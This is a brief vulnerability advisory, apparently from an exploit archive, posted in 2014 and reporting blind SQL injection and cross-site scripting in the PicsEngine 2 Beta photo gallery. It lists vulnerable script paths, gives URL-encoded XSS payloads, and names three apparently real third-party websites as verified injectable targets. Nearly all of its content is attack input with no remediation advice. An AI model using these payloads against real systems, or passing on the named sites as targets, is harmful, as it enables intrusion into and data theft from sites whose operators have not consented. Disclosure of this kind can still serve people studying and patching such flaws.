
PicsEngine 2 Beta Cross Site Scripting / SQL Injection

Posted on 10 March 2014

PicsEngine Application error message Vulnerability
==================================================
Author : indoushka
==================================================
vendor : Powered by PicsEngine 2 Beta
==================================================

Blind SQL Injection :

/chabluesphotos/xml/comments.php?id=if
/chabluesphotos/xml/get.php?id=if
/chabluesphotos/xml/photos.php?id=if

Cross site scripting (verified)

/chabluesphotos/xml/comments.php?id=1'%22()%26%25<ScRiPt%20>prompt(213771818860)</ScRiPt>
/chabluesphotos/xml/get.php?id=1'%22()%26%25<ScRiPt%20>prompt(213771818860)</ScRiPt>
/chabluesphotos/xml/photos.php?id=1'%22()%26%25<ScRiPt%20>prompt(213771818860)</ScRiPt>

SQL injection (verified)

http://www.tsampa.be/pics/xml/photos.php?id=1
http://www.sylval.com/galerie/xml/photos.php?id=1
http://lacroizette.sur-le-web.fr/locaux/xml/photos.php?id=1

 
